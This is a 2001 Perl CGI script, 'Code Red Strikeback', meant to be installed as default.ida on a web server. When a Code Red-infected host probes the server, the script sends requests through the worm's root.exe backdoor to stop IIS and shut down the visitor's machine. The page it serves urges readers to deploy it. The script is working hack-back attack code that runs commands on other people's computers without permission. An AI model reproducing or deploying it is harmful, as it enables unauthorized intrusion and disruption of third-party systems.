#!/usr/bin/perl -w # default.ida in perl # Copyright 2001 Sam Phillips # ideas borrowed from Erin Quinlan # ideas provided by various Internet folk, and all those darn # Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers # (http://www.pigdog.org) # # Things that this should do... # * Send email to the machine owner # * Not act as an attack amplifier - someone could theoretically use this # to launch a DOS attack of sorts. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # This has been modified pretty much randomly by Chunky # Specifically, it doesn't e-mail the admin, since the admin obviously # doesn't care. # It also has been re-ordered so it attempts to shut down the server, # before rebooting IIS; elsewise, how is the server gonna be # rebooted? # This is nowadays less effective than another script I wrote, # available from http://icculus.org/~chunky/iis/ # Gary (-; use LWP::UserAgent; $|++; print "Content-Type: text/html\n\n"; if (length ($ENV{QUERY_STRING}) > 0) { my $ua = new LWP::UserAgent; $ua->agent ("Code Red Strikeback"); $ua->timeout (20); my $server_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"); my $iis_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop"); print "probulating...
"; my $resp = $ua->request ($iis_stop_req); if ($resp->is_success) { print "Appears we have shut down IIS...
"; my $server_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"); $resp = $ua->request ($iis_stop_req); if ($resp->is_success) { print "Appears that we have also shutdown whatever OS too...
"; } # ok this will do magic email stuff when I get a chance to write it. } else { print "

Looks like you're still here...

"; } } print <

WELCOME PEOPLE!

If you are reading this page, then you are probably curious...

This page is actually a script that will connect to your machine and try to shut it down. Since you are seeing this you probably aren't a Code Red infected box.

This will only work if you are infected with the "code red" virus which isn't really a virus but is a part of the Microsoft Internet Information Server (IIS).

If you were a Code Red infected IIS then the command just sent to port 80 was to stop iis and to reboot your machine. If you aren't infected, then you have nothing to worry about, otherwise.. you should really use a secure webserver don't you think?.. one that doesn't let people in a gaping back door to do stuff like this...)

This is how you can protect yourself and others, if you run perl, and a competent web server:

  1. Download this script.
  2. Rename it default.ida and place it in the DocumentRoot of your server
  3. Make sure the .ida extension is handled as a perl CGI script.
If you can't figure out any of the above instructions then find someone who can.

EOF